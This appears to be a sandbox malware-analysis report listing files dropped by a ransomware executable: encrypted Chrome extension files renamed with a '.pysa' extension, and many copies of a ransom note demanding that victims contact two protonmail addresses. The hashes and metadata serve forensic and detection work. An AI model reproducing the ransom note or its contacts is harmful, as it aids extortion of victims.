                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_CN\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_TW\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.153945287330034
                  Encrypted:false
                  SSDEEP:96:DrKt8YIJLZ93ukziGAYOdBrU58SefMmS10qdk31YVDUQzyVmZ/:DrKmFh+IOdvDMmSn2OUG
                  MD5:FD66A1C3BE51DE03A7C2242D3C3BDC24
                  SHA1:BFE4A6EC49BB4A60A5D013520123F55FBB8AC1CF
                  SHA-256:3A25EA6D44C192E654BE568438C4432C8D222DEE6530F3DAA7F1C7D3C4DD0862
                  SHA-512:655742FF39ACC47635277EEEBE0362735691ADA0F86DB37303393274CD30B44D57EB04DBC74AF2F7A4D8E7ADC334438D4C9D1B6F1235B379C8AB20B372D10591
                  Malicious:false
                  Preview: ]Yq.r.<h.q..vv..b.....Y.Wc.4.....;|C.+.Am.#..)....l..>+a....}......F..Ta?.^.:n.mN~.7.I._..v....s......x[l~.UO.. ....<CMb...H.7.y..C....z4x...'B...]..yS'a*m.j......z...X...E....S1...6......v..W.%.H).U..C.y.../j.e.%.....3..m.z8..s..a.t..m.W.T..&0>{...V..v..B....w.T3..=F..BR....^..=..-.'&-.n...Z.-...y..0...PM..Q.T..-......`.jN..)........A@3..c..i^O.i:..XD$.h...T..$..P5.=s:.wV..VWr..p+3..e.9o...W>.ZC.|.%|z.h=n...^...b.r...,/.t..(.=....Kt%.@*...>.\.&.|...I.l.k.t..L.......{..,...|I1.wyk.....'.O".....l&...}...(.l..-.L.7..B...4Gg@.....rm.&f."3.......,-\...P...c...G...C.0....(5`.a...o.FU.3.:.\.a.D.e...vN...W..)....G@9.a4..+....+....k.....E..W.sXH..B...u.u.....FK.....GH..W-.<.=U`.x.........+.Ml...L...R].;|m[_...2.7......1j)dE..q...z.s..../.CH..3./=.){..t...7{h..b..I94...h.L...Q....+.~....km........Bf..\..B....f..P4..9.u"...t.P'....^.R..;.@.i].. ..s....#3\.....8.....4.5J.w..P.2.P.07.!4.}.[-...q....*.F.X..Q3.2^f..X.......H......_........^.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8192
                  Entropy (8bit):7.598558069039041
                  Encrypted:false
                  SSDEEP:192:7tEXwH6zPX8kHYphIlLt+G9dHTLUsc9FP4+6sTEZKU692ParR6f:7tEgHq0T+hzQssshRy2SrR6f
                  MD5:C360D2AB50AAC3942D1C0F403A73ECF9
                  SHA1:A3948E947BBF96CE90DF4523317A71EBE2A04513
                  SHA-256:B782F1715E7EB85E180ECA44BEDB898FFB4999EEBF0BD33FC5EDB40332655142
                  SHA-512:F97EBB39E413818C15A510B98788B19D38A36C85E93DB275C26533E6F4EE788F7A5FB6E44102E7D03FA50B36EE4C4CE4058264CF9C048EAB8EDBC3DEE4FCA077
                  Malicious:false
                  Preview: g.K,@.dN! .....Ys......o..?.....2..'v..5.UC....p.....$+.....U..."D.....T..9T....?7.....1.Q\. @..l.[...K..Y..P.q./.`2J...1.m.n.S...Yv.8...L.|Nxv..}/..n..q.N."mJ.}.O......KG`.gl3n....[...Cr.........^..../.H...(.o......=.G ..fv..vDuxI5+..N:l~..[..N.dTC...\.n.....R..V.g.le&..*.i...',..........N......Ly?Q.y?..7...].{ .u7.p_"W!.=....0.....[9./#....:...S..K'C.o8...........0"1 .1CL.......>..X......,......J.WQ..?x".......B.`.m..?(1..Xw......_...b\,...../..v..^+}#.".......Tb.t."..A.H.$..1....Z..t...5)!/">.^..Z..OY7..MEY#...R....F"a..j%...........R..d............%.H.L..(..kI....&.D..H........Gl..s.;.G.}.p..e..TV1.c.!....%....u.@A(....b>..r|.Y...^PG.#3......N...l....|.>..J7.~n2z..E.1.x.}#..HV\...O..+..Gr.u`.$..~.&..:v.AK.}...l...\F..........]..<<I.8..l.7"T|"|"bO.....=?....z..$.0...[Uf..H.=...q....GZc.4=..%.u.;......mm.........C...........l.Z.....>I..6=.Ii9.z.._G....Y...9s.cfv....g?@...%...J..7,L....k..z.v.a5p....p.B.."....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
